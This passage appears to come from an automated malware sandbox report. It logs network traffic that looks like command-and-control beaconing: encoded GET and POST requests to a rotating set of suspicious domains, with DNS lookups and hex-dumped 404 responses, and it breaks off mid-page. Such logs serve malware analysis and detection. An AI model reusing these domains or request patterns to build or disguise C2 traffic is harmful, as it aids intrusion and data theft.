              Source: global trafficHTTP traffic detected: GET /kxtt/?XxGx=INH0eLoh&60q4=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhz8HJcA2kRlIFQIbzI/ZykrVSnU5kYfD/4QtIXIX4MBGxA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nosolofichas.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?60q4=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVCqIKu7QdDn5nrP80R2HqmHJKcPW9CiGC+2tegxRRJIzTA==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.denture-prices.clickConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sonixingenuine.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /b9e2/?60q4=KXKmlftrGUnNwN7yhNFRHhuh5Rs4DPRuyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NOYW1ed+75fZ9khrC38pBidS91YBqsB3/Rw22POvSz2t7Q==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.moyu19.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: global trafficDNS traffic detected: DNS query: www.nosolofichas.online
              Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global trafficDNS traffic detected: DNS query: www.adadev.info
              Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
              Source: global trafficDNS traffic detected: DNS query: www.ebsmadrid.store
              Source: global trafficDNS traffic detected: DNS query: www.denture-prices.click
              Source: global trafficDNS traffic detected: DNS query: www.sonixingenuine.shop
              Source: global trafficDNS traffic detected: DNS query: www.moyu19.pro
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 36 30 71 34 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4d 53 75 34 69 32 52 55 75 4f 6e 54 61 5a 4e 73 42 56 79 69 43 56 76 4a 39 6b 44 59 7a 70 63 30 51 67 46 4f 51 34 3d Data Ascii: 60q4=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvMSu4i2RUuOnTaZNsBVyiCVvJ9kDYzpc0QgFOQ4=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BSUU7A5I%2B8HDLDchLCo2xPdxLeuomz7zeRIWeKiMfFF%2BMIUbi20WDhxrCRf64aCWWRWQDgqQGbKhMJBouR1zVxN%2Bs0YbU%2FDqYBBGhhiJwWWEgx3HK8HOHtKKU71soSUVGvH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb5f1a4a8c87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2393&min_rtt=2393&rtt_var=1196&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBZgsLJXLKEg0j2cqiu70vR9Jn7W5MMZ3N7ISmU1NfOPK3opPolBKVIPg0yqNAVHBhI0zj00DxnJ45h%2BEWFCdclS0Q7paiZWh5rkPHFTgTih79MKj32FVZwrJVinFaRat0eM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb6f2b014232-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWIim4cKpCgYImUdI7SP2%2BD%2BCxuR3HTeypD9hmDZ6lC0J%2BVs0rClhHwG65e%2FhO5PrRIQmRRraOHnJfQRNSlR41jkSxSHv0pCtmXF1Quooyyu1YRs2vHK0VT1EmqeW4%2F%2Fpcie"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb7eeffa0f5d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:12:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KK%2FJ7Ij1qP1IG2N7Q%2FHf5Q%2Fc%2BjJhMiJNyqNO%2F6QA0Me2deDq0UsvV6yusfLWwyzThMVN1nDwr9kY%2FHGcdb%2FU%2FppC63oglpjjOjEyjmNNyze%2BS2fHosaqbfj6VJRFHS%2BhTTqy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015fb8efd8d43ee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1723&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:48 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:51 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:53 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 14:12:56 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 14:13:01 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
